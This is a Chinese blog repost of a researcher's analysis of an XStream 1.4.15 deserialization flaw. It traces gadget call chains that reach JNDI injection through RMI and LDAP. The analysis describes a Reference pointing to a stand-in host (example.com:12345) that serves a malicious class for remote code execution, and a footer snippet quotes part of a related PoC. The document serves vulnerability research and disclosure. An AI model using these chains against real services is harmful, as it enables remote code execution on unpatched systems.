XStream<=1.4.15-反序列化-JNDI注入

最新推荐文章于 2024-01-04 14:15:07 发布
最新推荐文章于 2024-01-04 14:15:07 发布
阅读量652 收藏
点赞数
分类专栏: 优质安全文章 文章标签: java 安全 xstream jndi
原文链接:https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247485525&idx=1&sn=510030af81b195205e8ff7bf922acef2&chksm=f9ee64eace99edfcde9f943c738d6fc6b4f91e9ea00654a02105ada88f98c6c903bf0df7af01&scene=178&cur_album_id=1778727772132081669#rd
版权
欢迎关注我的微信公众号:安全攻防渗透

信息安全领域原创公号,专注信安领域人才培养和知识分享,致力于帮助叁年以下信安从业者的学习和成长。

BNkKyn.png

原创 卫兵实验室 安恒信息安全研究院

漏洞复现证明截图

在这里插入图片描述

影响范围

XStream<=1.4.15

漏洞分析

年前找的一个链,前天害怕被撞就交了,结果今天就发了补丁,不过修的几个链跟我找的sink点和触发toString点都不一样,应该算一个新的CVE的,在这里给大家分享出来。
回顾下CVE-2020-26217的调用栈

com.thoughtworks.xstream.converters.collections.MapConverter#putCurrentEntryIntoMap
    java.util.HashMap#put
        java.util.HashMap#hash
            jdk.nashorn.internal.objects.NativeString#hashCode
                com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data#toString
                com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data#get
                    com.sun.xml.internal.bind.v2.util.ByteArrayOutputStreamEx#readFrom
                        java.io.SequenceInputStream#read(byte[], int, int)
                        java.io.SequenceInputStream#nextStream
                            javax.swing.MultiUIDefaults.MultiUIDefaultsEnumerator#nextElement
                                javax.imageio.spi.FilterIterator#next
                                javax.imageio.spi.FilterIterator#advance
                                    javax.imageio.ImageIO.ContainsFilter#filter
                                        java.lang.ProcessBuilder#start

hashcode()->toString() 的入口 jdk.nashorn.internal.objects.NativeString 和 sink点 javax.imageio.ImageIO$ContainsFilter 都被加入到了黑名单中。

不过我们可以复用 java.io.SequenceInputStream#nextStream 去找新的sink点。
在这里插入图片描述

RMI

com.sun.jndi.rmi.registry.BindingEnumeration

在这里插入图片描述
ctxvar2 我们都可控,因此这里可以进行JNDI注入。不过 ctxcom.sun.jndi.rmi.registry.RegistryContext 类型的,我们只能打rmi的JNDI注入,继续找找看有没有ldap的。

LDAP

com.sun.jndi.ldap.LdapBindingEnumeration#createItem

在这里插入图片描述
DirectoryManager.getObjectInstance 可以通过传入 Reference 对象来加载恶意class,var6this.homeCtxthis.homeCtx.envpropsvar2 我们都可控,回溯一下var4
在这里插入图片描述
跟进 decodeReference,由于 decodeObject 中的 var0 我们可控,最终可以让代码进入到 decodeReference 方法中,且 new Reference 的所有参数都可控,构造 new Reference("refClassName", "factoryClassName", "http://example.com:12345/") 传入 DirectoryManager.getObjectInstance 即可加载 http://example.com:12345/ 上名为 factoryClassName.class 的类,将恶意代码放入static代码块即可任意代码执行。
在这里插入图片描述
com.sun.jndi.ldap.LdapBindingEnumeration 直接传过去会出现 this.data 不为null的情况,所以我用了 com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl 来间接调用 LdapBindingEnumeration#next 方法。

在这里插入图片描述

触发toString()

然后还有 toString 的入口,找了一圈所有类的 hashcode() 方法也没有找到能够触发 toString 的类,由于 SerializableConverter 支持调用 readObject 方法,前提是该类实现了 java.io.Serializable 接口(类的属性没有实现该接口依然可以被正常赋值),并且没有被之前的转换器捕获到,因此我们可以找找所有类的 readObject 方法。
在这里插入图片描述
比较常用的是 javax.management.BadAttributeValueExpException#readObject ,但是该类继承了 Throwable ,会被 ThrowableConverter 补货到,无法被 SerializableConverter 解析。

1
因此我们需要找一个新的类,我找到了一条可以用于Java原生反序列化触发 toString() 的链,这里暂不公开,下面是公开的几个CVE中用到的 toString 链。

java.util.PriorityQueue#readObject
        ->java.util.PriorityQueue#heapify
                ->java.util.PriorityQueue#siftDown
                        ->java.util.PriorityQueue#siftDownUsingComparator
                              ->javafx.collections.ObservableList#sorted()#compare()

在这里插入图片描述
不过这个链只能用在XStream中而不能用在Java原生反序列化中的,因为 javafx.collections.ObservableList 没有实现序列化接口。

RMI
java.util.PriorityQueue#readObject
    java.util.PriorityQueue#heapify
        java.util.PriorityQueue#siftDown
            java.util.PriorityQueue#siftDownUsingComparator
              javafx.collections.ObservableList#sorted()#compare()
                  com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data#toString
                  com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data#get
                  com.sun.xml.internal.bind.v2.util.ByteArrayOutputStreamEx#readFrom
                      java.io.SequenceInputStream#read(byte[], int, int)
                      java.io.SequenceInputStream#nextStream
                          com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl#nextElement
                              com.sun.jndi.rmi.registry.BindingEnumeration#next
                                  RegistryContext.lookup
Ldap
java.util.PriorityQueue#readObject
    java.util.PriorityQueue#heapify
        java.util.PriorityQueue#siftDown
            java.util.PriorityQueue#siftDownUsingComparator
              javafx.collections.ObservableList#sorted()#compare()
                  com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data#toString
                  com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data#get
                  com.sun.xml.internal.bind.v2.util.ByteArrayOutputStreamEx#readFrom
                     java.io.SequenceInputStream#read(byte[], int, int)
                     java.io.SequenceInputStream#nextStream
                         com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl#nextElement
                             com.sun.jndi.ldap.AbstractLdapNamingEnumeration#next
                                 com.sun.jndi.ldap.LdapBindingEnumeration#createItem
                                     javax.naming.spi.DirectoryManager#getObjectInstance

版权声明:该篇文章来自于:Smi1e@卫兵实验室
原创地址:XStream<=1.4.15-反序列化-JNDI注入

安全攻防渗透
关注
专栏目录
xstream1.4.15.JAR
02-23
XStream < 1.4.15 反序列化漏洞修复
Java安全XStream 1.4.15反序列化漏洞CVE-2021-21345复现与浅析
Ho1aAs‘s Blog
08-17 1465
一种绕过黑名单、触发造成RCE的姿势XStream1.4.15 PoC XStream怎么序列化和反序列化PriorityQueue? 分析PoC之前先看看XStream是怎么对待PriorityQueue的:PriorityQueue继承了Serializable,因此使用的是SerializableConveter 因此在doMarshal和doUnMarshal时会调用write/readObject 看PoC使用的是优先级队列,CC链的常客了,写一个demo看看XStream是怎么反序.
XStream 组件漏洞修复
悟●禅●酒的专栏
04-06 2320
风险描述 XStreamJava 类库中的常用组件,可将Java 对象序列化为XML,反之可将Java 对象和XML 文档相互转换。 XStream 官方发布安全公告,披露多个反序列化漏洞,包括: 1、拒绝服务漏洞(CVE-2021-21341/21348)攻击者可利用该漏洞操纵已处理的输入流并替换或注入对象,执行恶意正则表达式的计算,从而造成拒绝服务攻击。 2、服务端请求伪造漏洞(CVE-2021-21342/21349)攻击者可利用该漏洞操纵已处理的输入流并替换或注入对象,从而伪造服务端请求。
服务器漏洞文件被删除漏洞,漏洞资源|XStream随意文件删除/服务器端请求仿冒漏洞风险性通知(CVE-2021-26259,CVE-2021-26258)...
weixin_35182625的博客
08-03 496
近日,腾讯云服务安全运营管理中心检测到,XStream官方发布有关XStream反序列化漏洞的风险性通知(漏洞序号:CVE-2020-26259,CVE-2020-26258),假如编码中应用了XStream,未受权的远程控制攻击者,可结构特殊的实例化数据信息导致随意文件删除或服务器端请求仿冒。为防止您的业务流程受影响,腾讯云服务安全性建议立即进行安全性自纠自查,如在受影响范畴,请您立即开展升级修...
xstream-1.4.15.jar
01-28
XStream 反序列化漏洞(CVE-2020-26258 & 26259),修复jar包 xstream-1.4.15.jar XstreamJava 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发。 0x01 漏洞描述 Xstream上次对CVE-2020-26217处理并不彻底,虽然通过黑名单方法阻止了远程代码执行,但是仍然可以采用类似思路实现文件删除与服务器请求伪造。 影响版本 Xstream = 1.4.15 风险等级 严重
xstream-distribution-1.4.15-bin.zip
03-09
4. **XStream-1.4.15版本** 这个版本修复了一些已知问题,增强了性能,并对API进行了一些优化。具体改动可以查阅官方的发布日志,以获取详细的改进和修复内容。 5. **实际应用示例** 假设我们有如下的Java类: ...
XStream <--> Java 对象序列化为 XML 互换
08-11
使用 XStream 不用任何映射就能实现多数 Java 对象的序列化。在生成的 XML 中对象名变成了元素名,类中的字符串组成了 XML 中...该下载资源包括示例源码、相关的 xpp3_min-1.1.4c.jar xstream-1.3.jar 包及XStream API
xstream最新版 - xstream-1.4.18.jar
12-21
xstream最新版jar包
Bboss和xstream序列化反序列化性能对比1
08-08
在本文中,我们将深入探讨Bboss和Xstream两个序列化和反序列化库在性能方面的差异。这两个库在Java开发中广泛用于将对象转换为XML格式,以便于存储、传输或持久化。以下是对这两个库的详细分析。 首先,Bboss和...
如何更新jar包或者jar包中的文件
lw585625的博客
10-27 1374
jar文件:/home/resin.jar 需更新包中com/caucho/server/port/Port.class类文件 方法1: jar uf resin.jar com/caucho/server/port/Port.class 要求是必须知道jar包的结构要非常熟悉,可以使用:jar tf resin.jar来查看。 方法2: 解压jar xvf resi...
dom4j和XStream的最新版jar包以及简单示例demo(xml解析)
09-07
解压后有一个文件夹(包含了dom4j和XStream的简单示例),一个dom4j.jar(用dom4j只需要把这个添加到项目里面),一个xstream-1.4.8的jar包、源码、说明文档.zip(用xstream就解压这个包然后放到项目里面)
xstream-1.4.11.1.zip jar包
02-01
java jar包,亲测试可用 安全,可以对其进行数字签名,只让能够识别数字签名的用户使用里面的东西。 加快下载速度; 压缩,使文件变小,与ZIP压缩机制完全相同。 包封装。能够让JAR包里面的文件依赖于统一版本的类文件。 可移植性,能够在各种平台上直接使用。 把一个JAR文件添加到系统的classpath环境变量之后,java通常会把这个JAR文件当做一个路径来处理。通常使用jar命令来压缩,可以把一个或多个路径全部压缩成一个JAR文件。
XStream 1.4.11 jar包
04-14
java对象转xml以及xml转java对象,操作很简单 xml与java互相转换,比较简单的一个工具类,对xml的支持比较完美
xstream-1.4.8最齐全的jar包
12-26
java对象转xml以及xml转java对象,操作很简单 xml与java互相转换,比较简单的一个工具类,对xml的支持比较完美
xStream完整Jar包
12-13
本来想0分上传的,但是最低是1,这是测试没有报错的完整jar包
Xstream反序列化分析(CVE-2021-39149)
最新发布
zkaqlaoniao的博客
01-04 633
前几个月XStream爆出一堆漏洞,这两天翻了翻,发现这波洞应该是黑名单绕过的最后一波了。因为在最新版的XStream 1.4.18中已经默认开启白名单的安全框架,按照XStream官方补漏洞的习惯,应该不会再接受新的绕过黑名单的漏洞了。
xstream 版本_XStream任意文件删除/服务端请求伪造漏洞预警通报(CVE202026259/CVE202026258)...
weixin_28862113的博客
01-21 1113
大网安协【2020-77】近日,大连网络安全信息通报机制合作单位新华三集团提醒,新华三攻防实验室监测到XStream官方更新了两则漏洞风险通告(CVE-2020-26258、CVE-2020-26259),并进行了复现和分析。1. 漏洞综述1.1 漏洞背景XStream是一个简单、易用的Java类库,主要用于在Java对象和XML之间进行序列化和反序列化,支持所有的基础类型、数组及集合...
[CVE-2020-26258/26259]Xstream任意文件删除/SSRF漏洞
公众号shadow sock7
12-15 3334
漏洞详情 CVE-2020-26259: 任意文件删除。 CVE-2020-26258: SSRF 细节 poc [CVE-2020-26258] SSRF <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class='com.sun.xml.internal.bind.v2.run
comsat java_java-com.thoughtworks.xstream.converters.ConversionExce...
weixin_29103603的博客
02-15 458
[EDITED]我正在处理的项目是Java J2EE中的3个文件夹项目,带有servlet和Hibernate以实现持久性.结构如下:-管理员->具有bean和HTML / CSS的主程序-Jar->罐子,Hibernate工具和类-War->与Servlet在它们之间,我使用Xstream共享类和重要信息.我正在使用Eclipse和Tomcat 7.希望大家都能得到这个全球性的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值